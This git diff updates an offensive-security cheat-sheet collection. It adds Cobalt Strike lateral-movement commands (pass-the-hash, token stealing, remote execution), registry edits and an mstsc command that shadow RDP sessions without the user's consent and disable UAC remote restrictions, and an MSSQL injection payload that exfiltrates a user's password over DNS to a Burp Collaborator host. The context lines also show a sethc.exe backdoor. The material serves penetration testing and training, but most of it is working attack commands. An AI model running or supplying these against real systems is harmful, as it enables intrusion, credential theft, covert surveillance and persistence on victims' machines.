diff --git a/Methodology and Resources/Cobalt Strike - Cheatsheet.md b/Methodology and Resources/Cobalt Strike - Cheatsheet.md index e570f2b..f708f6b 100644 --- a/Methodology and Resources/Cobalt Strike - Cheatsheet.md +++ b/Methodology and Resources/Cobalt Strike - Cheatsheet.md @@ -313,6 +313,19 @@ beacon > execute-assembly /home/audit/Rubeus.exe ## Lateral Movement +- **portscan:** Performs a portscan on a spesific target. +- **runas:** A wrapper of runas.exe, using credentials you can run a command as another user. +- **pth:** By providing a username and a NTLM hash you can perform a Pass The Hash attack and inject a TGT on the current process. \ +:exclamation: This module needs Administrator privileges. +- **steal_token:** Steal a token from a specified process. +- **make_token:** By providing credentials you can create an impersonation token into the current process and execute commands from the context of the impersonated user. +- **jump:** Provides easy and quick way to move lateraly using winrm or psexec to spawn a new beacon session on a target. \ +:exclamation: The **jump** module will use the current delegation/impersonation token to authenticate on the remote target. \ +:muscle: We can combine the **jump** module with the **make_token** or **pth** module for a quick "jump" to another target on the network. +- **remote-exec:** Execute a command on a remote target using psexec, winrm or wmi. \ +:exclamation: The **remote-exec** module will use the current delegation/impersonation token to authenticate on the remote target. +- **ssh/ssh-key:** Authenticate using ssh with password or private key. Works for both linux and windows hosts. + :warning: All the commands launch powershell.exe ```powershell diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md index d865beb..743ca6f 100644 --- a/Methodology and Resources/Windows - Persistence.md +++ b/Methodology and Resources/Windows - Persistence.md @@ -25,6 +25,7 @@ * [RDP Backdoor](#rdp-backdoor) * [utilman.exe](#utilman.exe) * [sethc.exe](#sethc.exe) + * [Remote Desktop Services Shadowing](#remote-desktop-services-shadowing) * [Skeleton Key](#skeleton-key) * [References](#references) @@ -314,6 +315,31 @@ Hit F5 a bunch of times when you are at the RDP login screen. REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f ``` +### Remote Desktop Services Shadowing + +:warning: FreeRDP and rdesktop don't support Remote Desktop Services Shadowing feature. + +Requirements: +* RDP must be running + +```powershell +reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v Shadow /t REG_DWORD /d 4 +# 4 – View Session without user’s permission. + +# Allowing remote connections to this computer +reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f + + +# Disable UAC remote restriction +reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f + +mstsc /v:{ADDRESS} /shadow:{SESSION_ID} /noconsentprompt /prompt +# /v parameter lets specify the {ADDRESS} value that is an IP address or a hostname of a remote host; +# /shadow parameter is used to specify the {SESSION_ID} value that is a shadowee’s session ID; +# /noconsentprompt parameter allows to bypass a shadowee’s permission and shadow their session without their consent; +# /prompt parameter is used to specify a user’s credentials to connect to a remote host. +``` + ### Skeleton Key ```powershell diff --git a/SQL Injection/MSSQL Injection.md b/SQL Injection/MSSQL Injection.md index 28b870d..c4edcef 100644 --- a/SQL Injection/MSSQL Injection.md +++ b/SQL Injection/MSSQL Injection.md @@ -15,7 +15,9 @@ * [MSSQL Time Based](#mssql-time-based) * [MSSQL Stacked query](#mssql-stacked-query) * [MSSQL Command execution](#mssql-command-execution) -* [MSSQL UNC path](#mssql-unc-path) +* [MSSQL Out of band](#mssql-out-of-band) + * [MSSQL DNS exfiltration](#mssql-dns-exfiltration) + * [MSSQL UNC path](#mssql-unc-path) * [MSSQL Make user DBA](#mssql-make-user-dba-db-admin) * [MSSQL Trusted Links](#mssql-trusted-links) @@ -134,7 +136,7 @@ ProductID=1';waitfor delay '0:0:10'-- ProductID=1');waitfor delay '0:0:10'-- ProductID=1));waitfor delay '0:0:10'-- -IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]' comment: -- +IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]' comment: -- ``` ## MSSQL Stacked Query @@ -187,8 +189,18 @@ print(sys.version) GO ``` +## MSSQL Out of band -## MSSQL UNC Path +### MSSQL DNS exfiltration + +Technique from https://twitter.com/ptswarm/status/1313476695295512578/photo/1 + +```powershell +1 and exists(select * from fn_trace_gettable('\\'%2b(select pass frop users where id=1)%2b'.xxxxxxx.burpcollaborator.net\1.trc',default)) +``` + + +### MSSQL UNC Path MSSQL supports stacked queries so we can create a variable pointing to our IP address then use the `xp_dirtree` function to list the files in our SMB share and grab the NTLMv2 hash.